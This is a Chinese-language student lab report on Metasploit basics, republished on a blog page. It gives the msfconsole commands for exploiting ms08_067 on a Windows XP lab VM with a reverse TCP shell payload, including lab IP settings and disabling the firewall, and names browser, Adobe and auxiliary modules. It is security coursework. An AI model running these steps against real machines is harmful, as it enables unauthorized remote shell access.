20155205 郝博雅 Exp5 MSF基礎應用
阿新 • • 發佈:2018-04-18
客戶 IT 應用 arc console eve ons 掌握 asp
20155205 郝博雅 Exp5 MSF基礎應用
一、實驗目標
- 本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
1.一個主動攻擊實踐,如ms08_067; (1分)
一個針對瀏覽器的攻擊,如ms11_050;(1分)
一個針對客戶端的攻擊,如Adobe;(1分)
成功應用任何一個輔助模塊。(0.5分)
基礎問題回答:用自己的話解釋什麽是exploit,payload,encode?
- exploit相當於一個載體,把攻擊代碼運送到耙機中;payload相當於shellcode;encode一是為了避免payload中出現壞字符,從而影響payload的功能,二是為了實現免殺。
二、實驗內容
主動攻擊:ms08_067漏洞攻擊
靶機: windows XP SP3(English)
攻擊機:kali
- 輸入
msfconsole
進入控制臺,輸入search ms08_067
指令查詢一下針對該漏洞可以運用的攻擊模塊:
- 輸入
use exploit/windows/smb/ms08_067_netapi
使用該模塊:
- 使用
show payloads
查看可以供我們使用的payload
並找到一個可用的攻擊載荷:
用
set payload generic/shell_reverse_tcp
即tcp反向回連設置payload
。使用指
令show options
查看我們需要設置的參數,需要設置一個RHOST(靶機的IP地址)和一個LHOST(攻擊機的IP地址)。並且看到target是0,即自動選擇目標系統類型,就不用再設置了。
- 使用
set LHOST 192.168.206.129
和set LPORT 5205
設置本機地址和端口,使用set RHOST 192.168.206.135
設置耙機地址,使用show options
查看設置結果:
- 接著使用
exploit
指令開始攻擊,出現了一個錯誤:
- 關閉XP的防火墻:
- 攻擊成功,獲取了耙機的shell:
對瀏覽器攻擊:ms10_046漏洞攻擊
對Adobe的漏洞攻擊:adobe_toolbutton
輔助模塊的應用:smb_version
20155205 郝博雅 Exp5 MSF基礎應用